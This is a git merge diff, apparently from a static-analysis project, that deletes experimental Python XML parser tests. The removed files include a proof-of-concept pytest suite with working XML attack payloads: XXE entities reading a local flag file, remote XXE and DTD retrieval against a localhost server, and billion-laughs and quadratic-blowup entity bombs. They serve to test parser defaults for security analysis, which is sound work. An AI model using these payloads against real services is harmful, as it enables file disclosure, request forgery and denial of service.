Merge branch 'main' into pyMaD

python/ql/test/experimental/dataflow/typetracking/tracked.ql

@@ -131,7 +131,7 @@ DataFlow::Node foo() { foo(DataFlow::TypeTracker::end()).flowsTo(result) }
 /** Gets a reference to `foo.bar` (fictive module). */
 private DataFlow::TypeTrackingNode foo_bar(DataFlow::TypeTracker t) {
   t.start() and
-  result = API::moduleImport("foo.bar").getAnImmediateUse()
+  result = API::moduleImport("foo").getMember("bar").getAnImmediateUse()
   or
   t.startInAttr("bar") and
   result = foo()
@@ -145,7 +145,7 @@ DataFlow::Node foo_bar() { foo_bar(DataFlow::TypeTracker::end()).flowsTo(result)
 /** Gets a reference to `foo.bar.baz` (fictive attribute on `foo.bar` module). */
 private DataFlow::TypeTrackingNode foo_bar_baz(DataFlow::TypeTracker t) {
   t.start() and
-  result = API::moduleImport("foo.bar.baz").getAnImmediateUse()
+  result = API::moduleImport("foo").getMember("bar").getMember("baz").getAnImmediateUse()
   or
   t.startInAttr("baz") and
   result = foo_bar()

python/ql/test/experimental/library-tests/frameworks/XML/ExperimentalXmlConceptsTests.ql

@@ -1,33 +0,0 @@
-import python
-import experimental.semmle.python.Concepts
-import experimental.semmle.python.frameworks.Xml
-import semmle.python.dataflow.new.DataFlow
-import TestUtilities.InlineExpectationsTest
-private import semmle.python.dataflow.new.internal.PrintNode
-
-class XmlParsingTest extends InlineExpectationsTest {
-  XmlParsingTest() { this = "XmlParsingTest" }
-
-  override string getARelevantTag() { result in ["input", "vuln"] }
-
-  override predicate hasActualResult(Location location, string element, string tag, string value) {
-    exists(location.getFile().getRelativePath()) and
-    exists(XML::XMLParsing parsing |
-      exists(DataFlow::Node input |
-        input = parsing.getAnInput() and
-        location = input.getLocation() and
-        element = input.toString() and
-        value = prettyNodeForInlineTest(input) and
-        tag = "input"
-      )
-      or
-      exists(XML::XMLVulnerabilityKind kind |
-        parsing.vulnerableTo(kind) and
-        location = parsing.getLocation() and
-        element = parsing.toString() and
-        value = "'" + kind + "'" and
-        tag = "vuln"
-      )
-    )
-  }
-}

python/ql/test/experimental/library-tests/frameworks/XML/lxml_etree.py

@@ -1,54 +0,0 @@
-from io import StringIO
-import lxml.etree
-
-x = "some xml"
-
-# different parsing methods
-lxml.etree.fromstring(x) # $ input=x vuln='XXE'
-lxml.etree.fromstring(text=x) # $ input=x vuln='XXE'
-
-lxml.etree.fromstringlist([x]) # $ input=List vuln='XXE'
-lxml.etree.fromstringlist(strings=[x]) # $ input=List vuln='XXE'
-
-lxml.etree.XML(x) # $ input=x vuln='XXE'
-lxml.etree.XML(text=x) # $ input=x vuln='XXE'
-
-lxml.etree.parse(StringIO(x)) # $ input=StringIO(..) vuln='XXE'
-lxml.etree.parse(source=StringIO(x)) # $ input=StringIO(..) vuln='XXE'
-
-lxml.etree.parseid(StringIO(x)) # $ input=StringIO(..) vuln='XXE'
-lxml.etree.parseid(source=StringIO(x)) # $ input=StringIO(..) vuln='XXE'
-
-# With default parsers (nothing changed)
-parser = lxml.etree.XMLParser()
-lxml.etree.fromstring(x, parser=parser) # $ input=x vuln='XXE'
-
-parser = lxml.etree.get_default_parser()
-lxml.etree.fromstring(x, parser=parser) # $ input=x vuln='XXE'
-
-# manual use of feed method
-parser = lxml.etree.XMLParser()
-parser.feed(x) # $ input=x vuln='XXE'
-parser.feed(data=x) # $ input=x vuln='XXE'
-parser.close()
-
-# XXE-safe
-parser = lxml.etree.XMLParser(resolve_entities=False)
-lxml.etree.fromstring(x, parser) # $ input=x
-lxml.etree.fromstring(x, parser=parser) # $ input=x
-
-# XXE-vuln
-parser = lxml.etree.XMLParser(resolve_entities=True)
-lxml.etree.fromstring(x, parser=parser) # $ input=x vuln='XXE'
-
-# Billion laughs vuln (also XXE)
-parser = lxml.etree.XMLParser(huge_tree=True)
-lxml.etree.fromstring(x, parser=parser) # $ input=x vuln='Billion Laughs' vuln='Quadratic Blowup' vuln='XXE'
-
-# Safe for both Billion laughs and XXE
-parser = lxml.etree.XMLParser(resolve_entities=False, huge_tree=True)
-lxml.etree.fromstring(x, parser=parser) # $ input=x
-
-# DTD retrival vuln (also XXE)
-parser = lxml.etree.XMLParser(load_dtd=True, no_network=False)
-lxml.etree.fromstring(x, parser=parser) # $ input=x vuln='DTD retrieval' vuln='XXE'

python/ql/test/experimental/library-tests/frameworks/XML/poc/PoC.py

@@ -1,677 +0,0 @@
-#!/usr/bin/env python3
-
-# this file doesn't have a .py extension so the extractor doesn't pick it up, so it
-# doesn't have to be annotated
-
-# This file shows the ways to make exploit vulnerable XML parsing
-# see
-# https://pypi.org/project/defusedxml/#python-xml-libraries
-# https://docs.python.org/3.10/library/xml.html#xml-vulnerabilities
-
-import pathlib
-from flask import Flask
-import threading
-import multiprocessing
-import time
-from io import StringIO
-import pytest
-
-HOST = "localhost"
-PORT = 8080
-
-
-FLAG_PATH = pathlib.Path(__file__).with_name("flag")
-
-# ==============================================================================
-# xml samples
-
-ok_xml = f"""<?xml version="1.0"?>
-<test>hello world</test>
-"""
-
-local_xxe = f"""<?xml version="1.0"?>
-<!DOCTYPE dt [
-    <!ENTITY xxe SYSTEM "file://{FLAG_PATH}">
-]>
-<test>&xxe;</test>
-"""
-
-remote_xxe = f"""<?xml version="1.0"?>
-<!DOCTYPE dt [
-    <!ENTITY remote_xxe SYSTEM "http://{HOST}:{PORT}/xxe">
-]>
-<test>&remote_xxe;</test>
-"""
-
-billion_laughs = """<?xml version="1.0"?>
-<!DOCTYPE lolz [
- <!ENTITY lol "lol">
- <!ELEMENT lolz (#PCDATA)>
- <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
- <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
- <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
- <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
- <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
- <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
- <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
- <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
- <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
-]>
-<lolz>&lol9;</lolz>"""
-
-quadratic_blowup = f"""<?xml version="1.0"?>
-<!DOCTYPE wolo [
-  <!ENTITY oops "{"a" * 100000}">
-]>
-<foo>{"&oops;"*20000}</foo>"""
-
-dtd_retrieval = f"""<?xml version="1.0"?>
-<!DOCTYPE dt PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://{HOST}:{PORT}/test.dtd">
-<foo>bar</foo>
-"""
-
-# ==============================================================================
-# other setup
-
-# we set up local Flask application so we can tests whether loading external resources
-# works (such as SSRF from DTD-retrival works)
-app = Flask(__name__)
-
-@app.route("/alive")
-def alive():
-    return "ok"
-
-hit_dtd = False
-@app.route("/test.dtd")
-def test_dtd():
-    global hit_dtd
-    hit_dtd = True
-    return """<?xml version="1.0" encoding="UTF-8"?>"""
-
-hit_xxe = False
-@app.route("/xxe")
-def test_xxe():
-    global hit_xxe
-    hit_xxe = True
-    return "ok"
-
-def run_app():
-    app.run(host=HOST, port=PORT)
-
-@pytest.fixture(scope="session", autouse=True)
-def flask_app_running():
-    # run flask in other thread
-    flask_thread = threading.Thread(target=run_app, daemon=True)
-    flask_thread.start()
-
-    # give flask a bit of time to start
-    time.sleep(0.1)
-
-    # ensure that the server works
-    import requests
-    requests.get(f"http://{HOST}:{PORT}/alive")
-
-    yield
-
-def expects_timeout(func):
-    def inner():
-        proc = multiprocessing.Process(target=func)
-        proc.start()
-        time.sleep(0.1)
-        assert proc.exitcode == None
-        proc.kill()
-        proc.join()
-    return inner
-
-
-class TestExpectsTimeout:
-    "test that expects_timeout works as expected"
-
-    @staticmethod
-    @expects_timeout
-    def test_slow():
-        time.sleep(1000)
-
-    @staticmethod
-    def test_fast():
-        @expects_timeout
-        def fast_func():
-            return "done!"
-
-        with pytest.raises(AssertionError):
-            fast_func()
-
-# ==============================================================================
-import xml.sax
-import xml.sax.handler
-
-class SimpleHandler(xml.sax.ContentHandler):
-    def __init__(self):
-        self.result = []
-
-    def characters(self, data):
-        self.result.append(data)
-
-class TestSax():
-    # always vuln to billion laughs, quadratic
-
-    @staticmethod
-    @expects_timeout
-    def test_billion_laughs_allowed_by_default():
-        parser = xml.sax.make_parser()
-        parser.parse(StringIO(billion_laughs))
-
-    @staticmethod
-    @expects_timeout
-    def test_quardratic_blowup_allowed_by_default():
-        parser = xml.sax.make_parser()
-        parser.parse(StringIO(quadratic_blowup))
-
-    @staticmethod
-    def test_ok_xml():
-        handler = SimpleHandler()
-        parser = xml.sax.make_parser()
-        parser.setContentHandler(handler)
-        parser.parse(StringIO(ok_xml))
-        assert handler.result == ["hello world"], handler.result
-
-    @staticmethod
-    def test_xxe_disabled_by_default():
-        handler = SimpleHandler()
-        parser = xml.sax.make_parser()
-        parser.setContentHandler(handler)
-        parser.parse(StringIO(local_xxe))
-        assert handler.result == [], handler.result
-
-    @staticmethod
-    def test_local_xxe_manually_enabled():
-        handler = SimpleHandler()
-        parser = xml.sax.make_parser()
-        parser.setContentHandler(handler)
-        parser.setFeature(xml.sax.handler.feature_external_ges, True)
-        parser.parse(StringIO(local_xxe))
-        assert handler.result[0] == "SECRET_FLAG", handler.result
-
-    @staticmethod
-    def test_remote_xxe_manually_enabled():
-        global hit_xxe
-        hit_xxe = False
-
-        handler = SimpleHandler()
-        parser = xml.sax.make_parser()
-        parser.setContentHandler(handler)
-        parser.setFeature(xml.sax.handler.feature_external_ges, True)
-        parser.parse(StringIO(remote_xxe))
-        assert handler.result == ["ok"], handler.result
-        assert hit_xxe == True
-
-    @staticmethod
-    def test_dtd_disabled_by_default():
-        global hit_dtd
-        hit_dtd = False
-
-        parser = xml.sax.make_parser()
-        parser.parse(StringIO(dtd_retrieval))
-        assert hit_dtd == False
-
-    @staticmethod
-    def test_dtd_manually_enabled():
-        global hit_dtd
-        hit_dtd = False
-
-        parser = xml.sax.make_parser()
-        parser.setFeature(xml.sax.handler.feature_external_ges, True)
-        parser.parse(StringIO(dtd_retrieval))
-        assert hit_dtd == True
-
-
-# ==============================================================================
-import xml.etree.ElementTree
-
-class TestEtree:
-
-    # always vuln to billion laughs, quadratic
-    @staticmethod
-    @expects_timeout
-    def test_billion_laughs_allowed_by_default():
-        parser = xml.etree.ElementTree.XMLParser()
-        _root = xml.etree.ElementTree.fromstring(billion_laughs, parser=parser)
-
-    @staticmethod
-    @expects_timeout
-    def test_quardratic_blowup_allowed_by_default():
-        parser = xml.etree.ElementTree.XMLParser()
-        _root = xml.etree.ElementTree.fromstring(quadratic_blowup, parser=parser)
-
-    @staticmethod
-    def test_ok_xml():
-        parser = xml.etree.ElementTree.XMLParser()
-        root = xml.etree.ElementTree.fromstring(ok_xml, parser=parser)
-        assert root.tag == "test"
-        assert root.text == "hello world"
-
-    @staticmethod
-    def test_ok_xml_sax_parser():
-        # you _can_ pass a SAX parser to xml.etree... but it doesn't give you the output :|
-        parser = xml.sax.make_parser()
-        root = xml.etree.ElementTree.fromstring(ok_xml, parser=parser)
-        assert root == None
-
-    @staticmethod
-    def test_ok_xml_lxml_parser():
-        # this is technically possible, since parsers follow the same API, and the
-        # `fromstring` function is just a thin wrapper... seems very unlikely that
-        # anyone would do this though :|
-        parser = lxml.etree.XMLParser()
-        root = xml.etree.ElementTree.fromstring(ok_xml, parser=parser)
-        assert root.tag == "test"
-        assert root.text == "hello world"
-
-    @staticmethod
-    def test_xxe_not_possible():
-        parser = xml.etree.ElementTree.XMLParser()
-        try:
-            _root = xml.etree.ElementTree.fromstring(local_xxe, parser=parser)
-            assert False
-        except xml.etree.ElementTree.ParseError as e:
-            assert "undefined entity &xxe" in str(e)
-
-    @staticmethod
-    def test_dtd_not_possible():
-        global hit_dtd
-        hit_dtd = False
-
-        parser = xml.etree.ElementTree.XMLParser()
-        _root = xml.etree.ElementTree.fromstring(dtd_retrieval, parser=parser)
-        assert hit_dtd == False
-
-# ==============================================================================
-import lxml.etree
-
-class TestLxml:
-    # see https://lxml.de/apidoc/lxml.etree.html?highlight=xmlparser#lxml.etree.XMLParser
-    @staticmethod
-    def test_billion_laughs_disabled_by_default():
-        parser = lxml.etree.XMLParser()
-        try:
-            _root = lxml.etree.fromstring(billion_laughs, parser=parser)
-            assert False
-        except lxml.etree.XMLSyntaxError as e:
-            assert "Detected an entity reference loop" in str(e)
-
-    @staticmethod
-    def test_quardratic_blowup_disabled_by_default():
-        parser = lxml.etree.XMLParser()
-        try:
-            _root = lxml.etree.fromstring(quadratic_blowup, parser=parser)
-            assert False
-        except lxml.etree.XMLSyntaxError as e:
-            assert "Detected an entity reference loop" in str(e)
-
-    @staticmethod
-    @expects_timeout
-    def test_billion_laughs_manually_enabled():
-        parser = lxml.etree.XMLParser(huge_tree=True)
-        root = lxml.etree.fromstring(billion_laughs, parser=parser)
-
-    @staticmethod
-    @expects_timeout
-    def test_quadratic_blowup_manually_enabled():
-        parser = lxml.etree.XMLParser(huge_tree=True)
-        root = lxml.etree.fromstring(quadratic_blowup, parser=parser)
-
-    @staticmethod
-    def test_billion_laughs_huge_tree_not_enough():
-        parser = lxml.etree.XMLParser(huge_tree=True, resolve_entities=False)
-        root = lxml.etree.fromstring(billion_laughs, parser=parser)
-        assert root.tag == "lolz"
-        assert root.text == None
-
-    @staticmethod
-    def test_quadratic_blowup_huge_tree_not_enough():
-        parser = lxml.etree.XMLParser(huge_tree=True, resolve_entities=False)
-        root = lxml.etree.fromstring(quadratic_blowup, parser=parser)
-        assert root.tag == "foo"
-        assert root.text == None
-
-    @staticmethod
-    def test_ok_xml():
-        parser = lxml.etree.XMLParser()
-        root = lxml.etree.fromstring(ok_xml, parser=parser)
-        assert root.tag == "test"
-        assert root.text == "hello world"
-
-    @staticmethod
-    def test_local_xxe_enabled_by_default():
-        parser = lxml.etree.XMLParser()
-        root = lxml.etree.fromstring(local_xxe, parser=parser)
-        assert root.tag == "test"
-        assert root.text == "SECRET_FLAG\n", root.text
-
-    @staticmethod
-    def test_local_xxe_disabled():
-        parser = lxml.etree.XMLParser(resolve_entities=False)
-        root = lxml.etree.fromstring(local_xxe, parser=parser)
-        assert root.tag == "test"
-        assert root.text == None
-
-    @staticmethod
-    def test_remote_xxe_disabled_by_default():
-        global hit_xxe
-        hit_xxe = False
-
-        parser = lxml.etree.XMLParser()
-        try:
-            root = lxml.etree.fromstring(remote_xxe, parser=parser)
-            assert False
-        except lxml.etree.XMLSyntaxError as e:
-            assert "Failure to process entity remote_xxe" in str(e)
-        assert hit_xxe == False
-
-    @staticmethod
-    def test_remote_xxe_manually_enabled():
-        global hit_xxe
-        hit_xxe = False
-
-        parser = lxml.etree.XMLParser(no_network=False)
-        root = lxml.etree.fromstring(remote_xxe, parser=parser)
-        assert root.tag == "test"
-        assert root.text == "ok"
-        assert hit_xxe == True
-
-    @staticmethod
-    def test_dtd_disabled_by_default():
-        global hit_dtd
-        hit_dtd = False
-
-        parser = lxml.etree.XMLParser()
-        root = lxml.etree.fromstring(dtd_retrieval, parser=parser)
-        assert hit_dtd == False
-
-    @staticmethod
-    def test_dtd_manually_enabled():
-        global hit_dtd
-        hit_dtd = False
-
-        # Need to set BOTH load_dtd and no_network
-        parser = lxml.etree.XMLParser(load_dtd=True)
-        root = lxml.etree.fromstring(dtd_retrieval, parser=parser)
-        assert hit_dtd == False
-
-        parser = lxml.etree.XMLParser(no_network=False)
-        root = lxml.etree.fromstring(dtd_retrieval, parser=parser)
-        assert hit_dtd == False
-
-        parser = lxml.etree.XMLParser(load_dtd=True, no_network=False)
-        root = lxml.etree.fromstring(dtd_retrieval, parser=parser)
-        assert hit_dtd == True
-
-        hit_dtd = False
-
-        # Setting dtd_validation also does not allow the remote access
-        parser = lxml.etree.XMLParser(dtd_validation=True, load_dtd=True)
-        try:
-            root = lxml.etree.fromstring(dtd_retrieval, parser=parser)
-        except lxml.etree.XMLSyntaxError:
-            pass
-        assert hit_dtd == False
-
-
-# ==============================================================================
-
-import xmltodict
-
-class TestXmltodict:
-    @staticmethod
-    def test_billion_laughs_disabled_by_default():
-        d = xmltodict.parse(billion_laughs)
-        assert d == {"lolz": None}, d
-
-    @staticmethod
-    def test_quardratic_blowup_disabled_by_default():
-        d = xmltodict.parse(quadratic_blowup)
-        assert d == {"foo": None}, d
-
-    @staticmethod
-    @expects_timeout
-    def test_billion_laughs_manually_enabled():
-        xmltodict.parse(billion_laughs, disable_entities=False)
-
-    @staticmethod
-    @expects_timeout
-    def test_quardratic_blowup_manually_enabled():
-        xmltodict.parse(quadratic_blowup, disable_entities=False)
-
-    @staticmethod
-    def test_ok_xml():
-        d = xmltodict.parse(ok_xml)
-        assert d == {"test": "hello world"}, d
-
-    @staticmethod
-    def test_local_xxe_not_possible():
-        d = xmltodict.parse(local_xxe)
-        assert d == {"test": None}
-
-        d = xmltodict.parse(local_xxe, disable_entities=False)
-        assert d == {"test": None}
-
-    @staticmethod
-    def test_remote_xxe_not_possible():
-        global hit_xxe
-        hit_xxe = False
-
-        d = xmltodict.parse(remote_xxe)
-        assert d == {"test": None}
-        assert hit_xxe == False
-
-        d = xmltodict.parse(remote_xxe, disable_entities=False)
-        assert d == {"test": None}
-        assert hit_xxe == False
-
-    @staticmethod
-    def test_dtd_not_possible():
-        global hit_dtd
-        hit_dtd = False
-
-        d = xmltodict.parse(dtd_retrieval)
-        assert hit_dtd == False
-
-# ==============================================================================
-import xml.dom.minidom
-
-class TestMinidom:
-    @staticmethod
-    @expects_timeout
-    def test_billion_laughs():
-        xml.dom.minidom.parseString(billion_laughs)
-
-    @staticmethod
-    @expects_timeout
-    def test_quardratic_blowup():
-        xml.dom.minidom.parseString(quadratic_blowup)
-
-    @staticmethod
-    def test_ok_xml():
-        doc = xml.dom.minidom.parseString(ok_xml)
-        assert doc.documentElement.tagName == "test"
-        assert doc.documentElement.childNodes[0].data == "hello world"
-
-    @staticmethod
-    def test_xxe():
-        # disabled by default
-        doc = xml.dom.minidom.parseString(local_xxe)
-        assert doc.documentElement.tagName == "test"
-        assert doc.documentElement.childNodes == []
-
-        # but can be turned on
-        parser = xml.sax.make_parser()
-        parser.setFeature(xml.sax.handler.feature_external_ges, True)
-        doc = xml.dom.minidom.parseString(local_xxe, parser=parser)
-        assert doc.documentElement.tagName == "test"
-        assert doc.documentElement.childNodes[0].data == "SECRET_FLAG"
-
-        # which also works remotely
-        global hit_xxe
-        hit_xxe = False
-
-        parser = xml.sax.make_parser()
-        parser.setFeature(xml.sax.handler.feature_external_ges, True)
-        _doc = xml.dom.minidom.parseString(remote_xxe, parser=parser)
-        assert hit_xxe == True
-
-    @staticmethod
-    def test_dtd():
-        # not possible by default
-        global hit_dtd
-        hit_dtd = False
-
-        _doc = xml.dom.minidom.parseString(dtd_retrieval)
-        assert hit_dtd == False
-
-        # but can be turned on
-        parser = xml.sax.make_parser()
-        parser.setFeature(xml.sax.handler.feature_external_ges, True)
-        _doc = xml.dom.minidom.parseString(dtd_retrieval, parser=parser)
-        assert hit_dtd == True
-
-# ==============================================================================
-import xml.dom.pulldom
-
-class TestPulldom:
-    @staticmethod
-    @expects_timeout
-    def test_billion_laughs():
-        doc = xml.dom.pulldom.parseString(billion_laughs)
-        # you NEED to iterate over the items for it to take long
-        for event, node in doc:
-            pass
-
-    @staticmethod
-    @expects_timeout
-    def test_quardratic_blowup():
-        doc = xml.dom.pulldom.parseString(quadratic_blowup)
-        for event, node in doc:
-            pass
-
-    @staticmethod
-    def test_ok_xml():
-        doc = xml.dom.pulldom.parseString(ok_xml)
-        for event, node in doc:
-            if event == xml.dom.pulldom.START_ELEMENT:
-                assert node.tagName == "test"
-            elif event == xml.dom.pulldom.CHARACTERS:
-                assert node.data == "hello world"
-
-    @staticmethod
-    def test_xxe():
-        # disabled by default
-        doc = xml.dom.pulldom.parseString(local_xxe)
-        found_flag = False
-        for event, node in doc:
-            if event == xml.dom.pulldom.START_ELEMENT:
-                assert node.tagName == "test"
-            elif event == xml.dom.pulldom.CHARACTERS:
-                if node.data == "SECRET_FLAG":
-                    found_flag = True
-        assert found_flag == False
-
-        # but can be turned on
-        parser = xml.sax.make_parser()
-        parser.setFeature(xml.sax.handler.feature_external_ges, True)
-        doc = xml.dom.pulldom.parseString(local_xxe, parser=parser)
-        found_flag = False
-        for event, node in doc:
-            if event == xml.dom.pulldom.START_ELEMENT:
-                assert node.tagName == "test"
-            elif event == xml.dom.pulldom.CHARACTERS:
-                if node.data == "SECRET_FLAG":
-                    found_flag = True
-        assert found_flag == True
-
-        # which also works remotely
-        global hit_xxe
-        hit_xxe = False
-        parser = xml.sax.make_parser()
-        parser.setFeature(xml.sax.handler.feature_external_ges, True)
-        doc = xml.dom.pulldom.parseString(remote_xxe, parser=parser)
-        assert hit_xxe == False
-        for event, node in doc:
-            pass
-        assert hit_xxe == True
-
-    @staticmethod
-    def test_dtd():
-        # not possible by default
-        global hit_dtd
-        hit_dtd = False
-
-        doc = xml.dom.pulldom.parseString(dtd_retrieval)
-        for event, node in doc:
-            pass
-        assert hit_dtd == False
-
-        # but can be turned on
-        parser = xml.sax.make_parser()
-        parser.setFeature(xml.sax.handler.feature_external_ges, True)
-        doc = xml.dom.pulldom.parseString(dtd_retrieval, parser=parser)
-        for event, node in doc:
-            pass
-        assert hit_dtd == True
-
-# ==============================================================================
-import xml.parsers.expat
-
-class TestExpat:
-    # this is the underlying parser implementation used by the rest of the Python
-    # standard library. But people are probably not using this directly.
-
-    @staticmethod
-    @expects_timeout
-    def test_billion_laughs():
-        parser = xml.parsers.expat.ParserCreate()
-        parser.Parse(billion_laughs, True)
-
-    @staticmethod
-    @expects_timeout
-    def test_quardratic_blowup():
-        parser = xml.parsers.expat.ParserCreate()
-        parser.Parse(quadratic_blowup, True)
-
-    @staticmethod
-    def test_ok_xml():
-        char_data_recv = []
-        def char_data_handler(data):
-            char_data_recv.append(data)
-
-        parser = xml.parsers.expat.ParserCreate()
-        parser.CharacterDataHandler = char_data_handler
-        parser.Parse(ok_xml, True)
-
-        assert char_data_recv == ["hello world"]
-
-    @staticmethod
-    def test_xxe():
-        # not vuln by default
-        char_data_recv = []
-        def char_data_handler(data):
-            char_data_recv.append(data)
-
-        parser = xml.parsers.expat.ParserCreate()
-        parser.CharacterDataHandler = char_data_handler
-        parser.Parse(local_xxe, True)
-
-        assert char_data_recv == []
-
-        # there might be ways to make it vuln, but I did not investigate futher.
-
-    @staticmethod
-    def test_dtd():
-        # not vuln by default
-        global hit_dtd
-        hit_dtd = False
-
-        parser = xml.parsers.expat.ParserCreate()
-        parser.Parse(dtd_retrieval, True)
-        assert hit_dtd == False
-
-        # there might be ways to make it vuln, but I did not investigate futher.

python/ql/test/experimental/library-tests/frameworks/XML/poc/flag

@@ -1 +0,0 @@
-SECRET_FLAG

python/ql/test/experimental/library-tests/frameworks/XML/poc/this-dir-is-not-extracted

@@ -1 +0,0 @@
-just FYI

python/ql/test/experimental/library-tests/frameworks/XML/xml_dom.py

@@ -1,31 +0,0 @@
-from io import StringIO
-import xml.dom.minidom
-import xml.dom.pulldom
-import xml.sax
-
-x = "some xml"
-
-# minidom
-xml.dom.minidom.parse(StringIO(x)) # $ input=StringIO(..) vuln='Billion Laughs' vuln='Quadratic Blowup'
-xml.dom.minidom.parse(file=StringIO(x)) # $ input=StringIO(..) vuln='Billion Laughs' vuln='Quadratic Blowup'
-
-xml.dom.minidom.parseString(x) # $ input=x vuln='Billion Laughs' vuln='Quadratic Blowup'
-xml.dom.minidom.parseString(string=x) # $ input=x vuln='Billion Laughs' vuln='Quadratic Blowup'
-
-
-# pulldom
-xml.dom.pulldom.parse(StringIO(x))['START_DOCUMENT'][1] # $ input=StringIO(..) vuln='Billion Laughs' vuln='Quadratic Blowup'
-xml.dom.pulldom.parse(stream_or_string=StringIO(x))['START_DOCUMENT'][1] # $ input=StringIO(..) vuln='Billion Laughs' vuln='Quadratic Blowup'
-
-xml.dom.pulldom.parseString(x)['START_DOCUMENT'][1] # $ input=x vuln='Billion Laughs' vuln='Quadratic Blowup'
-xml.dom.pulldom.parseString(string=x)['START_DOCUMENT'][1] # $ input=x vuln='Billion Laughs' vuln='Quadratic Blowup'
-
-
-# These are based on SAX parses, and you can specify your own, so you can expose yourself to XXE (yay/)
-parser = xml.sax.make_parser()
-parser.setFeature(xml.sax.handler.feature_external_ges, True)
-xml.dom.minidom.parse(StringIO(x), parser) # $ input=StringIO(..) vuln='Billion Laughs' vuln='DTD retrieval' vuln='Quadratic Blowup' vuln='XXE'
-xml.dom.minidom.parse(StringIO(x), parser=parser) # $ input=StringIO(..) vuln='Billion Laughs' vuln='DTD retrieval' vuln='Quadratic Blowup' vuln='XXE'
-
-xml.dom.pulldom.parse(StringIO(x), parser) # $ input=StringIO(..) vuln='Billion Laughs' vuln='DTD retrieval' vuln='Quadratic Blowup' vuln='XXE'
-xml.dom.pulldom.parse(StringIO(x), parser=parser) # $ input=StringIO(..) vuln='Billion Laughs' vuln='DTD retrieval' vuln='Quadratic Blowup' vuln='XXE'

python/ql/test/experimental/library-tests/frameworks/XML/xml_etree.py

@@ -1,45 +0,0 @@
-from io import StringIO
-import xml.etree.ElementTree
-
-x = "some xml"
-
-# Parsing in different ways
-xml.etree.ElementTree.fromstring(x) # $ input=x vuln='Billion Laughs' vuln='Quadratic Blowup'
-xml.etree.ElementTree.fromstring(text=x) # $ input=x vuln='Billion Laughs' vuln='Quadratic Blowup'
-
-xml.etree.ElementTree.fromstringlist([x]) # $ input=List vuln='Billion Laughs' vuln='Quadratic Blowup'
-xml.etree.ElementTree.fromstringlist(sequence=[x]) # $ input=List vuln='Billion Laughs' vuln='Quadratic Blowup'
-
-xml.etree.ElementTree.XML(x) # $ input=x vuln='Billion Laughs' vuln='Quadratic Blowup'
-xml.etree.ElementTree.XML(text=x) # $ input=x vuln='Billion Laughs' vuln='Quadratic Blowup'
-
-xml.etree.ElementTree.XMLID(x) # $ input=x vuln='Billion Laughs' vuln='Quadratic Blowup'
-xml.etree.ElementTree.XMLID(text=x) # $ input=x vuln='Billion Laughs' vuln='Quadratic Blowup'
-
-xml.etree.ElementTree.parse(StringIO(x)) # $ input=StringIO(..) vuln='Billion Laughs' vuln='Quadratic Blowup'
-xml.etree.ElementTree.parse(source=StringIO(x)) # $ input=StringIO(..) vuln='Billion Laughs' vuln='Quadratic Blowup'
-
-xml.etree.ElementTree.iterparse(StringIO(x)) # $ input=StringIO(..) vuln='Billion Laughs' vuln='Quadratic Blowup'
-xml.etree.ElementTree.iterparse(source=StringIO(x)) # $ input=StringIO(..) vuln='Billion Laughs' vuln='Quadratic Blowup'
-
-
-# With parsers (no options available to disable/enable security features)
-parser = xml.etree.ElementTree.XMLParser()
-xml.etree.ElementTree.fromstring(x, parser=parser) # $ input=x vuln='Billion Laughs' vuln='Quadratic Blowup'
-
-# manual use of feed method
-parser = xml.etree.ElementTree.XMLParser()
-parser.feed(x) # $ input=x vuln='Billion Laughs' vuln='Quadratic Blowup'
-parser.feed(data=x) # $ input=x vuln='Billion Laughs' vuln='Quadratic Blowup'
-parser.close()
-
-# manual use of feed method on XMLPullParser
-parser = xml.etree.ElementTree.XMLPullParser()
-parser.feed(x) # $ input=x vuln='Billion Laughs' vuln='Quadratic Blowup'
-parser.feed(data=x) # $ input=x vuln='Billion Laughs' vuln='Quadratic Blowup'
-parser.close()
-
-# note: it's technically possible to use the thing wrapper func `fromstring` with an
-# `lxml` parser, and thereby change what vulnerabilities you are exposed to.. but it
-# seems very unlikely that anyone would do this, so we have intentionally not added any
-# tests for this.

python/ql/test/experimental/library-tests/frameworks/XML/xml_sax.py

@@ -1,64 +0,0 @@
-from io import StringIO
-import xml.sax
-
-x = "some xml"
-
-class MainHandler(xml.sax.ContentHandler):
-    def __init__(self):
-        self._result = []
-
-    def characters(self, data):
-        self._result.append(data)
-
-xml.sax.parse(StringIO(x)) # $ input=StringIO(..) vuln='Billion Laughs' vuln='Quadratic Blowup'
-xml.sax.parse(source=StringIO(x)) # $ input=StringIO(..) vuln='Billion Laughs' vuln='Quadratic Blowup'
-
-xml.sax.parseString(x) # $ input=x vuln='Billion Laughs' vuln='Quadratic Blowup'
-xml.sax.parseString(string=x) # $ input=x vuln='Billion Laughs' vuln='Quadratic Blowup'
-
-parser = xml.sax.make_parser()
-parser.parse(StringIO(x)) # $ input=StringIO(..) vuln='Billion Laughs' vuln='Quadratic Blowup'
-parser.parse(source=StringIO(x)) # $ input=StringIO(..) vuln='Billion Laughs' vuln='Quadratic Blowup'
-
-# You can make it vuln to both XXE and DTD retrieval by setting this flag
-# see https://docs.python.org/3/library/xml.sax.handler.html#xml.sax.handler.feature_external_ges
-parser = xml.sax.make_parser()
-parser.setFeature(xml.sax.handler.feature_external_ges, True)
-parser.parse(StringIO(x)) # $ input=StringIO(..) vuln='Billion Laughs' vuln='DTD retrieval' vuln='Quadratic Blowup' vuln='XXE'
-
-parser = xml.sax.make_parser()
-parser.setFeature(xml.sax.handler.feature_external_ges, False)
-parser.parse(StringIO(x)) # $ input=StringIO(..) vuln='Billion Laughs' vuln='Quadratic Blowup'
-
-# Forward Type Tracking test
-def func(cond):
